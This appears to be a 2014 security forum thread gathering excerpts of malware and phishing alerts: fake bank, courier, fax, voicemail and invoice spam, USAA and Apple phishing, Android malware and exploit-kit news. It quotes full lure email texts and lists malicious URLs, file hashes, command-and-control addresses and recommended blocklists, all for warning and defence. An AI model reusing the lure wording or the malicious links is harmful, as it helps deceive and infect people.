The attached ZIP file has the name DHL EXPRESS DELIVERY ATTEMPT.zip and contains the 293 kB large file DHL EXPRESS DELIVERY ATTEMPT.exe. The trojan is known as Trojan/Win32.Necurs, a variant of Win32/Injector.BLYN, W32/Injector.GLA!tr, Backdoor.Bot or Win32.Trojan.Bp-generic.Ixrn. At the time of writing, 6 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustot...sis/1410870424/
 

 

Edited by AplusWebMaster, 16 September 2014 - 09:50 AM.

[AplusWebMaster]

FYI...

Fake FAX SPAM - malware
- http://blog.dynamoo....you-havent.html
17 Sep 2014 - "This tired old spam format comes with warmed-over malware attachment.
    From:     Fax [fax@ victimdomain .com]
    Date:     17 September 2014 09:32
    Subject:     You've received a new fax
    New fax at SCAN6405035 from EPSON by https ://victimdomain .com
    Scan date: Wed, 17 Sep 2014 16:32:29 +0800
    Number of pages: 2
    Resolution: 400x400 DPI
    You can secure download your fax message at ...
    (Google Disk Drive is a file hosting service operated by Google, Inc.)

The link in the email downloads an archive file Message_Document_pdf.zip from the same estudiocarraro .com .br site. This has a VirusTotal detection rate of 3/54*. The ThreatTrack report shows that the malware attempts to phone home to:
denis-benker .de/teilen/1709uk1.hit
188.165.204.210/1709uk1/NODE01/0/51-SP3/0/
188.165.204.210/1709uk1/NODE01/1/0/0/
188.165.204.210/1709uk1/NODE01/41/5/4/
Recommended blocklist:
188.165.204.210
denis-benker .de
estudiocarraro .com.br"
* https://www.virustot...sis/1410943351/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/

188.165.204.210: https://www.virustot...10/information/
___

Fake ADP Invoice SPAM – PDF malware
- http://myonlinesecur...ce-pdf-malware/
17 Sep 2014 - "'ADP Invoice' pretending to come from billing.address.updates@ adp .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... we always say don’t open any attachment or file sent to you in an email, but with fake or malicious PDF files that is quite difficult.

Screenshot: http://myonlinesecur...licious-pdf.png

17 September 2014: adp_invoice_46887645.pdf
Current Virus total detections: 8/55* . This ADP Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410974477/
___

Android Malware uses SSL for Evasion
- http://blog.trendmic...sl-for-evasion/
Sep 17, 2014 - "... a double-edged sword. Android malware is now utilizing SSL to hide their routines and to evade detection. SSL servers have become a target of Android malware. Malware can use any of the three types of servers... This malware steals user and device information, such as the IMEI, phone number, and images stored in the SD card. Whenever the user starts the app or once the phone reboots, the app will start a backend service to dump the aforementioned information and use a hard-coded Gmail account and password to send the information to a particular email address... ANDROIDOS_TRAMP.HAT attempts to disguise itself as an official Google service. It collects user information like the phone number, location, and contact list. Upon execution, it registers GCMBroadCastReceiver. The malicious app will then post the -stolen- data via Google Cloud Messaging. Google Cloud Messaging is used for C&C communication of the malicious app. Commands such as “send message,” “block call,” and “get current location” are sent and received via Google Cloud Messaging... ANDROIDOS_BACKDOORSNSTWT.A triggers its C&C attack through Twitter. The malware crawls for Twitter URLs and combine the obtained information with a hard-coded string to generate a new C&C URL for attacks. The stolen information is sent to the generated URL... Cybercriminals may have also targeted SSL servers and services because because they do not need to exert much effort into gaining access to these sites. They can do so via normal and legal means, such as buying a virtual host from web-hosting services or registering a new account on Twitter. Should we see more use (and abuse) of SSL, detecting malicious apps may not be enough. Collaboration with server providers and services will be needed in removing related URLs, email addresses, and the like. Given the constant evolution of Android malware, we advise users to download Android apps only from legitimate sources. Third-party app stores may not be as strict when it comes to scanning for potentially malicious apps. We also advise users to use a security solution that can detect and block threats that may cause harm to mobile devices..."
(More detail at the trendmicro URL above.)
___

Fake UKFast invoice SPAM – malware attachment
- http://myonlinesecur...ke-pdf-malware/
17 Sep 2014 - "'UKFast invoice' pretending to come from UKFast Accounts <accounts@ ukfast .co.uk>is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subject line and the to: lines on these emails are blank...

Screenshot: http://myonlinesecur...ast-invoice.png

17 September 2014: Invoice-17009106-001.zip ( 137 kb): Extracts to:  Invoice 17009106-001.exe
Current Virus total detections: 0/55* . This UKFast invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410939664/
___

Fake Invoice SPAM ...
- http://myonlinesecur...ke-pdf-malware/
17 Sep 2014 - "'Strabane Weekly News INV0071981 – Newspaper copy' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... - same- malware as one version of today’s UKFast invoice – fake PDF malware*... The email looks like:
    Dear Sir,
    Please find attached the copy of the advert for INV0071981 in the Strabane Weekly News.
    Thank you,
    Darragh

This 'Strabane Weekly News INV0071981 – Newspaper copy' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecur...ke-pdf-malware/
 

 

Edited by AplusWebMaster, 17 September 2014 - 12:10 PM.

[AplusWebMaster]

FYI...

Fake NatWest SPAM - malware attached
- http://blog.dynamoo....voice-spam.html
18 Sep 2014 - "This -fake- NatWest invoice (since when did banks send invoices?) leads to a malicious ZIP file.
    From:     NatWest Invoice [invoice@ natwest .com]
    Date:     18 September 2014 11:06
    Subject:     Important - New account invoice
      Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
    To view/download your invoice please click here or follow the link below ...
    Thank you for choosing NatWest...

The link in this particular email goes to bnsoutlaws .co.uk/qvgstopmdi/njfeziackv.html which then downloads a ZIP file from bnsoutlaws .co.uk/qvgstopmdi/Account_Document.zip which in turn contains a malicious executable Account_Document.scr which has a VirusTotal detection rate of just 1/53*. The ThreatTrack report [pdf] shows that the malware attempts to call home...
Recommended blocklist:
188.165.204.210
liverpoolfc .bg
bnsoutlaws .co.uk "
* https://www.virustot...sis/1411032337/
... Behavioural information
TCP connections
91.215.216.52: https://www.virustot...52/information/
188.165.204.210: https://www.virustot...10/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/

UPDATE: The -same- malware is also being pushed by a fake Lloyds Bank email..
From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
Date:     18 September 2014 11:45
Subject:     Important - Commercial Documents
Important account documents
Reference: C146
Case number: 68819453
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...

- http://myonlinesecur...ke-pdf-malware/
18 Sep 2014
Screenshot: http://myonlinesecur...unt-invoice.png
___

USAA Phish ...
- https://blog.malware...hing-campaigns/
Sep 18, 2014 - "... phish pages targeting the United Services Automobile Association (USAA), a Fortune 500 financial company that offers banking, investing, and insurance to US Military soldiers and their families. Here is what the fake page looks like:
> https://blog.malware...lt-1024x851.png
... Users are then led to this page:
> https://blog.malware...in-1024x665.png
... Clicking the “Next” button opens this page wherein users can supply their secret questions and their respective answers:
> https://blog.malware...na-1024x789.png
... Clicking “Next” opens the last page, which asks for more information that needs “updating”, including full name and date of birth:
> https://blog.malware...fo-967x1024.png
... Users are then shown the door by redirecting them to the legitimate USAA page one sees when they log out... In case you receive emails claiming to be from USAA, please note that they do -not- send out emails to their clients, or to anyone for that matter, asking for their information. Here is a short list of tips to help you steer clear of USAA phishing attempts:
- Remain aware of phishing cases involving USAA. It’s also good to have their contact details handy in the event of fraud or account compromise.
- The legitimate USAA website, www.usaa.com, is a verified domain. As such, look for the green box beside its URL on the browser address bar. This site also uses SSL encryption, which means that it uses the https protocol, making it safe to access even over public networks.
- Ensure that the anti-phishing feature of your Internet browser is enabled. Do this for your antivirus software as well..."
___

Fake eFax SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
18 Sep 2014 - "'eFax Report' pretending to come from eFax Report <noreply@ efax-reports .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    INCOMING FAX REPORT
    Date/Time: Thursday, 18.09.2014
    Speed: 353bps
    Connection time: 08:02
    Page: 4
    Resolution: Normal
    Remote ID: 611-748-177946
    Line number: 3
    DTMF/DID:
    Description: Internal only ...

18 September 2014: fax-id9182719182837529.zip ( 189 kb): Extracts to: fax-id9182719182837529.scr
Current Virus total detections: 1/54* . This eFax Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411049220/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Line Voice Message Spam
- http://threattrack.t...ce-message-spam
18 Sep 2014 - "Subjects Seen:
    You have a voice message
Typical e-mail details:
    LINE Notification
    You have a voice message, listen it now.
    Time: 21:12:45 14.10.2014, Duration: 45sec

Malicious URLs:
    iagentnetwork .com/sql.php?line=gA7EF9bA7ns68jJ0eBi8ww
Malicious File Name and MD5:
    LINE_Call_<phone number>.zip (7FC6D33F62942B55AD94F20BDC7A3797)
    LINE_Call_<phone number>.exe (C3E0F4356A77D18438A38110F8BD919E)

Screenshot: https://gs1.wac.edge...Jmds1r6pupn.png

Tagged: Line.me, Kuluoz

147.202.201.24: https://www.virustot...24/information/
___

Chinese hacked U.S. military contractors ...
- http://www.reuters.c...N0HC1TA20140918
Sep 18, 2014 - "Hacks associated with the Chinese government have repeatedly infiltrated the computer systems of U.S. airlines, technology companies and other contractors involved in the movement of U.S. troops and military equipment, a U.S. Senate panel has found. The Senate Armed Services Committee's year-long probe, concluded in March but made public on Wednesday, found the military's U.S. Transportation Command, or Transcom, was aware of only two out of at least -20- such cyber intrusions within a single year. The investigation also found gaps in reporting requirements and a lack of information sharing among U.S. government entities. That in turn left the U.S. military largely unaware of computer compromises of its contractors..."
 

 

Edited by AplusWebMaster, 18 September 2014 - 02:04 PM.

[AplusWebMaster]

FYI...

Fake 'voice mail' SPAM ...
- http://blog.dynamoo....e-leads-to.html
19 Sep 2014 - "This -fake- voice mail message leads to malware:
    From:     Microsoft Outlook [no-reply@ victimdomain .com]
    Date:     19 September 2014 11:59
    Subject:     You have received a voice mail
    You received a voice mail : VOICE976-588-6749.wav (25 KB)
    Caller-Id: 976-588-6749
    Message-Id: D566Y5
    Email-Id: <REDACTED>
    Download and extract to listen the message.
    We have uploaded voicemail report on dropbox, please use the following link to download your file...
    Sent by Microsoft Exchange Server

The link in the email messages goes to www .prolococapena .com/yckzpntfyl/mahlqhltkh.html first and then downloads a file from www .prolococapena .com/yckzpntfyl/Invoice102740_448129486142_pdf.zip which contains exactly the -same- malicious executable being pushed in this earlier spam run*."
* http://blog.dynamoo....-yet-again.html
19 Sep 2014 - "... shows network activity to hallerindia .com on 192.185.97.223. I would suggest that this is a good domain to -block- ..."
Screenshot: https://2.bp.blogspo...600/natwest.png

192.185.97.223: https://www.virustot...23/information/

- http://myonlinesecur...ke-pdf-malware/
19 Sep 2014
Screenshot: http://myonlinesecur...t-statement.png
Current Virus total detections: 1/54*
* https://www.virustot...sis/1411120481/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'Police Suspect' SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
19 Sep 2014 - "'City of London Police Homicide Suspect' pretending to come from City of London Police is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Bulletin Headline: HOMICIDE SUSPECT
    Sending Agency: London City Police
    Sending Location: GB – London – London City Police
    Bulletin Case#: 14-62597
    Bulletin Author: BARILLAS #1169
    Sending User #: 92856
    APBnet Version: 684593
    The bulletin is a pdf attachment to this email.
    The Adobe Reader (from Adobe .com) will display and print the bulletin best.
    You can Not reply to the bulletin by clicking on the Reply button in your email software.

Of course it is -fake- and -not- from any Police force or Police service in UK or worldwide.
19 September 2014: Homicide-case#15808_pdf.zip : Extracts to:   Homicide-case#15808_pdf.exe
Current Virus total detections: 4/55* . This 'City of London Police Homicide Suspect' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411120670/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustot...10/information/
192.185.97.223: https://www.virustot...23/information/
___

Fake 'Courier Svc' SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
19 Sep 2014 - "'TNT UK Limited Package tracking' pretending to come from TNT COURIER SERVICE <tracking@tnt.co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     TNT COURIER SERVICE (TCS)
    Customer/Delivery Services Department
    Central Pk Est/Mosley Rd, Trafford Park
    Manchester, M17 1TT UK.
    DETAILS OF PACKAGE
    Reg order no: 460911612900
    Your package have been picked up and is ready for dispatch.
    Connote #           :               460911612900
    Service Type      :               Export Non Documents – Intl
    Shipped on         :               18 Sep 14 12:00
    Order No                    :       4240629
    Status          :       Driver’s Return
    Description     :      Wrong Address
    Service Options: You are required to select a service option below.
    The options, together with their associated conditions.
    Please check attachment to view information about the sender and package.

19 September 2014: Label_GB1909201488725UK_pdf.zip: Extracts to: Label_GB1909201488725UK_pdf.exe
Current Virus total detections: 5/55* . This 'TNT UK Limited Package tracking' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411121703/
... Behavioural information
DNS requests
hallerindia .com (192.185.97.223)
TCP connections
188.165.204.210: https://www.virustot...10/information/
192.185.97.223: https://www.virustot...23/information/
___

Bitcoin Ponzi scheme ...
- http://www.reuters.c...N0HE1Z820140919
Sep 19, 2014 - "A U.S. federal judge in Texas ordered Bitcoin Savings and Trust and its owner to pay a combined $40.7 million after the Securities and Exchange Commission established that the company, which sold investments using the virtual currency, was a Ponzi scheme. In a decision dated Thursday, U.S. Magistrate Judge Amos Mazzant said Trendon Shavers "knowingly and intentionally" operated his company "as a sham and a Ponzi scheme," misleading investors about the use of their bitcoin, how he would generate promised returns and the safety of their investments... The SEC said Shavers used the online moniker "pirateat40" to raise more than 732,000 bitcoin from February 2011 to August 2012, promising investors up to 7 percent in weekly interest to be paid based on his ability to trade the currency. But according to the decision, Shavers used new bitcoin to repay earlier investors, diverted some to personal accounts at the now-bankrupt Mt. Gox exchange and elsewhere, and spent some investor funds on rent, food, shopping and casino visits..."
___

Apple Phish ...
- https://isc.sans.edu...l?storyid=18669
2014-09-18 23:58:53 UTC - "... this in this morning:
Dear Client,
We inform you that your account is about to expire in less 48 hours, it's imperative to update your information with our audit forms, otherwise your session and/or account will be a limited access.
just click the link below and follow the steps our request form
Update now...
This is an automatically generated message. Thank you not to answer.  If you need help, please visit the Apple Support.
Apple Client Support.

A variation on the -many- phishing emails we see regularly, just taking advantage of two public events, the celebrity photos and the release of the new phone. Maybe a reminder to staff as well as friends and family to -ignore- emails that say "click here" ..."
___

Hack the ad network like a boss...
- https://www.virusbtn.../2014/08_15.xml
4 Sep 2014 - "... Exploit kits have been the scourge of the web for many years. Typically starting with a single line of inserted code, they probe for a number of vulnerabilities in the browser or its plug-ins and use this to drop malware onto the victim's machine. Given the high proportion of Internet users that haven't fully patched their systems, it is a successful way to spread malware.
> https://www.virusbtn...licious_ads.png
... in order for exploit kits to do their work, a vulnerable website must first be infected, or the user must be enticed into clicking a malicious link. But by purchasing ad space, and using this to place malicious ads, attackers have discovered a cheap and effective way to get their malicious code to run inside the browser of many users. They can even tailor their advertisements to target specific languages, regions or even website subjects... We learned last month that this is a serious problem - when researchers found that cybercriminals had purchased advertising space on Yahoo in order to serve the 'Cryptowall' ransomware.
> https://www.virusbtn...licious_ads.png
Ideally... advertising networks would block malicious ads as they are added to their systems... this is easier said than done: given the size of such networks, it would take a lot of time and resources - plus, technically, it's difficult to block most malicious ads without a certain percentage of false positives..."
 

 

Edited by AplusWebMaster, 20 September 2014 - 04:35 AM.

[AplusWebMaster]

FYI...

Fake gov't SPAM
- http://blog.dynamoo....ssion-spam.html
22 Sep 2014 - "This -fake- spam from the UK Government Gateway leads to malware:

Screenshot: https://4.bp.blogspo...600/gateway.png

The link in the email does -not- go to gateway .gov.uk at all, but in this case the the link goes to the following:
http ://maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://www .maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://maedarchitettura .it/wfntvkppqi/GatewaySubmission.zip
The ZIP file contains a malicious executable GatewaySubmission.exe which has a VirusTotal detection rate of 1/55*. The Anubis report** shows that it attempts to make a connection to ruralcostarica .com which is probably worth blocking."
* https://www.virustot...sis/1411383282/

184.168.152.32: https://www.virustot...32/information/

** https://anubis.isecl...f82&format=html

- http://myonlinesecur...ke-pdf-malware/
22 Sep 2014
Screenshot: http://myonlinesecur...-Submission.png
...
> https://www.virustot...sis/1411381013/
___

Fake 'LogMeIn' SPAM – malware
- http://myonlinesecur...update-malware/
22 Sep 2014"'September 22, 2014 LogMeIn Security Update' pretending to come from LogMeIn .com <auto-mailer@ logmein .com>is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Dear client,
    We are pleased to announce that LogMeIn has released a new security certificate.
    It contains new features:
    •    The certificate will be attached to the computer of the account holder, which will prevent any fraud activity
    •    Any irregular activity on your account will be detected by our security department
    •       This SSL security certificate patches the “Heartbleed” bug discovered earlier this year
    Download the attached certificate. Update will be automatically installed by double click.
    As always, your Logmein Support Team is happy to assist with any questions you may have.
    Feel free to contact us ...

22 September 2014: cert_client.zip (66 kb): Extracts to: cert.scr
Current Virus total detections: 2/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a large blue i instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411400614/
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205)
www .download .windowsupdate .com (95.101.0.104): https://www.virustot...04/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustot...20/information/
TCP connections
23.253.218.205: https://www.virustot...05/information/
95.101.0.83: https://www.virustot...83/information/
38.229.70.4: https://www.virustot....4/information/

- https://isc.sans.edu...l?storyid=18695
2014-09-22
Screenshot: https://isc.sans.edu...11_34_06 AM.png
...
> https://www.virustot...b0c3b/analysis/
File name: cert.scr.exe
Detection ratio: 3/51
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205): https://www.virustot...05/information/
www .download.windowsupdate .com (95.101.0.104): https://www.virustot...04/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustot...20/information/
TCP connections
23.253.218.205: https://www.virustot...05/information/
95.101.0.83: https://www.virustot...83/information/
38.229.70.4: https://www.virustot....4/information/
___

Fake USAA SPAM - PDF malware
- http://myonlinesecur...ds-pdf-malware/
22 Sep 2014 - "'USAA Policy Renewal – Please Print Auto ID Cards' pretending to come from USAA <USAA.Web.Services@customermail.usaa.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecur...to-ID-Cards.png

22 September 2014: id_card.pdf - Current Virus total detections: 11/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1411415107/

- http://threattrack.t...rance-card-spam
23 Sep 2014
Screenshot: https://gs1.wac.edge...1ERc1r6pupn.png
Tagged: USAA, CVE-2013-2729, Upatre, PDFExploit
___

Fake 'RBC Invoice' SPAM – PDF malware
- http://myonlinesecur...es-pdf-malware/
22 Sep 2014 - "'RBC Invoices' pretending to come from RBC Express <ISVAdmin@ rbc .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please review the attached invoices and pay them at your earliest convenience. Feel free to contact us if you have any questions.
    Thank you.

22 September 2014: invoice058342.pdf . Current Virus total detections: 10/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1411409482/
___

Fake 'Payment Advice' SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
22 Sep 2014 - "'HSBC Payment Advice Issued' pretending to come from HSBC Bank UK <payment.advice@ hsbc .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment or follow the link in the email... The email looks like:
    Your payment advice is issued at the request of our customer. The advice is for your reference only.
     Please download your payment advice at ...
     Yours faithfully,
    Global Payments and Cash Management
    This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.

... this drops a slightly different malware paymentadvice .exe with a current VT detections 0/53* . This HSBC Payment Advice Issued  is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411386112/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Invoice SPAM
- http://myonlinesecur...ke-pdf-malware/
22 Sep 2014 - "'PETER HOGARTH & SONS LTD Invoice 642555' pretending to come from john.williamson@ peterhogarth .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please find attached your Invoice(s)/Credit(s)
    PETER HOGARTH & SONS LTD
    INDUSTRIAL HYGIENE and PROTECTION
    Tel: 01472 345726 | Fax: 01472 250272 | Web...
    Estate Road No. 5, South Humberside Industrial Estate, Grimsby, North East Lincolnshire, DN31 2UR
    Peter Hogarth & Sons Ltd is a company registered in England.
    Company Registration Number: 1143352...

22 September 2014: Attachment.zip (230 kb): Extracts to: Invoice 77261990001.PDF.exe
Current Virus total detections: 3/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411380202/
___

European banks / Europol in cybercrime fightback
- http://www.reuters.c...N0RN1WO20140922
Sep 22, 2014 - "Europe's banks have joined forces with Europol's cybercrime unit to try to combat the rising and increasingly sophisticated threat being posed by cyber criminals to financial firms. The European Banking Federation (EBF), which represents about 4,500 banks, and Europol's European Cybercrime Centre - known as EC3 - said on Monday they had signed a memorandum of understanding to intensify cooperation between law enforcement and the financial sector. Banks are facing frequent attacks from sophisticated hackers. Wall Street bank JP Morgan said last month it was working with U.S. law enforcement authorities to investigate a possible cyber attack, and Royal Bank of Scotland and its UK peers have suffered serious attacks by hackers that have disrupted systems... Cybercrime attacks faced by banks include coordinated attempts to disrupt websites, payment card fraud, and attempts to infiltrate systems to steal money. The agreement between the EBF, which is a federation of 32 national banking lobby groups, and EC3, which links cybercrime divisions of police forces in EU countries, will allow them to exchange know-how, statistics and strategic information. Banks are typically working closely with national police forces to fight cybercrime, and the new agreement should widen that across Europe..."
 

 

Edited by AplusWebMaster, 23 September 2014 - 07:48 AM.

[AplusWebMaster]

FYI...

Fake 'Voice Mail' SPAM
- http://blog.dynamoo....u-have-new.html
23 Sep 2014 - "This strangely titled spam leads to malware.
From:     Voice Mail
Date:     23 September 2014 10:17
Subject:     You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link ...
The link to this secure message will expire in 24 hours ...

The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
* https://www.virustot...sis/1411464313/

** http://anubis.isecla...27a&format=html

- http://myonlinesecur...ke-pdf-malware/
23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr Current Virus total detections: 2/54*
* https://www.virustot...sis/1411464313/
___

jQuery.com compromised to serve malware via drive-by download
- http://www.net-secur...ews.php?id=2869
23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromised happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediately re-imaging of the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
* http://www.riskiq.co...t-accounts-risk

>> https://blog.malware...RIG exploit kit

- https://isc.sans.edu...l?storyid=18699
2014-09-23

46.182.31.77: https://www.virustot...77/information/
___

Nuclear Exploit Kit evolves, includes Silverlight Exploit
- http://blog.trendmic...rlight-exploit/
Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit exploit kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
Timeline of exploits used by the Nuclear Exploit Kit:
> http://blog.trendmic...Timeline-01.jpg
Vulnerabilities targeted by the current Nuclear Exploit Kit:
> http://blog.trendmic...xploit_fig4.png
... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
* https://web.nvd.nist...d=CVE-2013-0074 - 9.3 (HIGH)
 

 

Edited by AplusWebMaster, 24 September 2014 - 06:39 AM.

[AplusWebMaster]

FYI...

Fake BankLine SPAM
- http://blog.dynamoo....re-message.html
24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
    From:     Bankline [secure.message@ bankline .com]
    Date:     24 September 2014 09:59
    Subject:     You have received a new secure message from BankLine
    You have received a secure message.
    Read your secure message by following the link bellow ...
    You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
    If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
    First time users - will need to register after opening the attachment...

The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
* https://www.virustot...sis/1411546325/

** https://anubis.isecl...3ef&format=html

- http://myonlinesecur...ke-pdf-malware/
24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
Current Virus total detections: 7/54*..."
* https://www.virustot...sis/1411565004/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Voice mail SPAM
- http://myonlinesecur...ke-wav-malware/
24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     Time: Sep 23, 2014 10:50:00 AM
    Click attachment to listen to Voice Message

24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to:   01636605058_20140919_105000.wav.exe
Current Virus total detections: 12/53*
This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( (sound)  file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411568872/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'overdue invoice' SPAM – malware
- http://myonlinesecur...nvoice-malware/
24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
    Reminder of overdue invoice: 708872110964932
    Overdue Payment: 122274492356288
    Due Date E-Mail Reminder: 417785972641224
    Payment reminder: 461929101577209
    Past Due Reminder Letter: 199488661953143
    Bills Reminder: 325332051074690
    Automatic reminder: 676901889653218
    Late payment: 475999033756578
    Reminder: 215728756825356
The email looks like:
    Hello,
     This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
    Account ID: 5FCDMF9. This notice is a reminder your payment is due.
     Regards,
    Rex Gloeckler
